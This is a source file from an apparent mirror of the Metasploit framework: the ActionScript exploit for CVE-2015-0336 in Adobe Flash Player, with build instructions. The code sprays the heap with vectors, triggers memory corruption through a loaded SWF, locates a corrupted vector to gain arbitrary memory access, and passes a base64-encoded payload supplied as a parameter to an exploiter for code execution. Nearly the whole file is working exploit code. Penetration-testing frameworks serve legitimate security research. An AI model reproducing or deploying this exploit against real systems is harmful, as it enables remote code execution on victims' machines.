infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
metasploit-framework/external/source/exploits/CVE-2015-0336/Exploit.as

129 lines
4.8 KiB
ActionScript
Raw Blame History

// Build how to:
// 1. Download the AIRSDK, and use its compiler.
// 3. Download the Flex SDK (4.6)
// 4. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
// (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
// 5. Build with: mxmlc -o msf.swf Exploit.as
// It uses some original code from @hdarwin89 for exploitation using ba's and vectors
package
{
import flash.display.Sprite
import flash.display.LoaderInfo
import flash.display.Loader
import flash.utils.ByteArray
import flash.utils.Endian
import flash.utils.*
import flash.external.ExternalInterface
import mx.utils.Base64Decoder
public class Exploit extends Sprite
{
private var uv:Vector.<uint> = new Vector.<uint>
private var exploiter:Exploiter
private var spray:Vector.<Object> = new Vector.<Object>(89698)
private var interval_id:uint
private var trigger_swf:String
private var b64:Base64Decoder = new Base64Decoder()
private var payload:ByteArray
private var platform:String
private var os:String
private var original_length:uint = 0
public function Exploit()
{
var i:uint = 0
platform = LoaderInfo(this.root.loaderInfo).parameters.pl
os = LoaderInfo(this.root.loaderInfo).parameters.os
trigger_swf = LoaderInfo(this.root.loaderInfo).parameters.tr
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
var pattern:RegExp = / /g;
b64_payload = b64_payload.replace(pattern, "+")
b64.decode(b64_payload)
payload = b64.toByteArray()
if (platform == 'win') {
original_length = 0x1e
for (i = 0; i < 89698; i = i + 1) {
spray[i] = new Vector.<uint>(1014)
spray[i][0] = 0xdeadbeef
spray[i][1] = 0xdeedbeef
spray[i][2] = i
spray[i][29] = 0x14951429
}
for(i = 0; i < 89698; i = i + 1) {
spray[i].length = 0x1e
}
} else if (platform == 'linux') {
original_length = 1022
for (i = 0; i < 89698; i = i + 1) {
spray[i] = new Vector.<uint>(1022)
spray[i][0] = 0xdeadbeef
spray[i][1] = 0xdeedbeef
spray[i][2] = i
spray[i][29] = 0x956c1490 // 0x956c1490 + 0xb6c => 0x956c1ffc => controlled by position 1021
spray[i][39] = 1 // 0x956c1fac + 0xf8 => is_connected = 1 in order to allow corruption of offsets 0x54 and 0x58
spray[i][1021] = 0x956c1fac // 0x956c1fac + 0x54 => 0x956c2000 (0x54, and 0x58 offsets are corrupted)
}
}
var trigger_byte_array:ByteArray = createByteArray(trigger_swf)
trigger_byte_array.endian = Endian.LITTLE_ENDIAN
trigger_byte_array.position = 0
// Trigger corruption
var trigger_loader:Loader = new Loader()
trigger_loader.loadBytes(trigger_byte_array)
interval_id = setTimeout(do_exploit, 2000)
}
private function createByteArray(hex_string:String) : ByteArray {
var byte:String
var byte_array:ByteArray = new ByteArray()
var hex_string_length:uint = hex_string.length
var i:uint = 0
while(i < hex_string_length)
{
byte = hex_string.charAt(i) + hex_string.charAt(i + 1)
byte_array.writeByte(parseInt(byte,16))
i = i + 2
}
return byte_array
}
private function do_exploit():void {
clearTimeout(interval_id)
for(var i:uint = 0; i < spray.length; i = i + 1) {
if (spray[i].length != 1022 && spray[i].length != 0x1e) {
Logger.log('[*] Exploit - Found corrupted vector at ' + i + ' with length 0x' + spray[i].length.toString(16))
spray[i][1022] = 0xffffffff
spray[i + 1][0x3ffffbff] = spray[i][1023]
spray[i + 1][0x3ffffbfe] = original_length
uv = spray[i + 1]
break
}
}
for(i = 0; i < spray.length; i = i + 1) {
if (spray[i].length == 1022 || spray[i].length == 0x1e) {
spray[i] = null
}
}
if (uv == null || uv.length != 0xffffffff) {
return
}
exploiter = new Exploiter(this, platform, os, payload, uv)
}
}
}
Reference in New Issue View Git Blame Copy Permalink